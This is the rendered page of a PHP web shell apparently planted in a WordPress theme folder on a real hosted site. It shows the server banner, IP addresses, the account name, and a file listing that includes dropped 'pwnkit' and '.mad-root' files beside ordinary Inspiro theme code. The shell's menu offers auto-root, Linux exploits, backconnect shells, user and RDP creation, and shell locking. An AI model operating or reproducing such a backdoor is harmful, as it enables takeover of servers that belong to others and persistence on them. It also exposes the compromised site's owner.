Linux webm003.cluster129.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.129.20.3 | : 216.73.217.63
Cant Read [ /etc/named.conf ]
8.4.22
chloega
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
chloega /
www /
wp-content /
themes /
inspiro /
inc /
[ HOME SHELL ]
Name
Size
Permission
Action
admin
[ DIR ]
drwxr-xr-x
classes
[ DIR ]
drwxr-xr-x
customizer
[ DIR ]
drwxr-xr-x
dynamic-css
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
admin-notice.php
4.72
KB
-rw-r--r--
back-compat.php
2.27
KB
-rw-r--r--
color-patterns.php
723
B
-rw-r--r--
common-functions.php
18.44
KB
-rw-r--r--
custom-header.php
18.26
KB
-rw-r--r--
customizer-functions.php
4.96
KB
-rw-r--r--
editor-fonts.php
2.53
KB
-rw-r--r--
google-fonts.php
186.01
KB
-rw-r--r--
icon-functions.php
2.41
KB
-rw-r--r--
marketing-functions.php
9.95
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
shortcodes.php
938
B
-rw-r--r--
starter-content.php
125.28
KB
-rw-r--r--
template-functions.php
7.5
KB
-rw-r--r--
template-tags.php
7.29
KB
-rw-r--r--
theme-media.php
2.4
KB
-rw-r--r--
wc-custom-functions.php
456
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : back-compat.php
<?php /** * Back compat functionality * * Prevents the theme from running on WordPress versions prior to 5.3, * since this theme is not meant to be backward compatible beyond that and * relies on many newer functions and markup changes introduced in 5.3. * * @package Inspiro * @subpackage Inspiro_Lite * @since Inspiro 1.0.0 */ /** * Display upgrade notice on theme switch. * * @since Inspiro 1.0.0 * * @return void */ function inspiro_switch_theme() { add_action( 'admin_notices', 'inspiro_upgrade_notice' ); } add_action( 'after_switch_theme', 'inspiro_switch_theme' ); /** * Adds a message for unsuccessful theme switch. * * Prints an update nag after an unsuccessful attempt to switch to * the theme on WordPress versions prior to 5.3. * * @since Inspiro 1.0.0 * * @global string $wp_version WordPress version. * * @return void */ function inspiro_upgrade_notice() { echo '<div class="error"><p>'; printf( /* translators: %s: WordPress Version. */ esc_html__( 'This theme requires WordPress 5.3 or newer. You are running version %s. Please upgrade.', 'inspiro' ), esc_html( $GLOBALS['wp_version'] ) ); echo '</p></div>'; } /** * Prevents the Customizer from being loaded on WordPress versions prior to 5.3. * * @since Inspiro 1.0.0 * * @global string $wp_version WordPress version. * * @return void */ function inspiro_customize() { wp_die( sprintf( /* translators: %s: WordPress Version. */ esc_html__( 'This theme requires WordPress 5.3 or newer. You are running version %s. Please upgrade.', 'inspiro' ), esc_html( $GLOBALS['wp_version'] ) ), '', array( 'back_link' => true, ) ); } add_action( 'load-customize.php', 'inspiro_customize' ); /** * Prevents the Theme Preview from being loaded on WordPress versions prior to 5.3. * * @since Inspiro 1.0.0 * * @global string $wp_version WordPress version. * * @return void */ function inspiro_preview() { if ( isset( $_GET['preview'] ) ) { // phpcs:ignore WordPress.Security.NonceVerification wp_die( sprintf( /* translators: %s: WordPress Version. */ esc_html__( 'This theme requires WordPress 5.3 or newer. You are running version %s. Please upgrade.', 'inspiro' ), esc_html( $GLOBALS['wp_version'] ) ) ); } } add_action( 'template_redirect', 'inspiro_preview' );
Close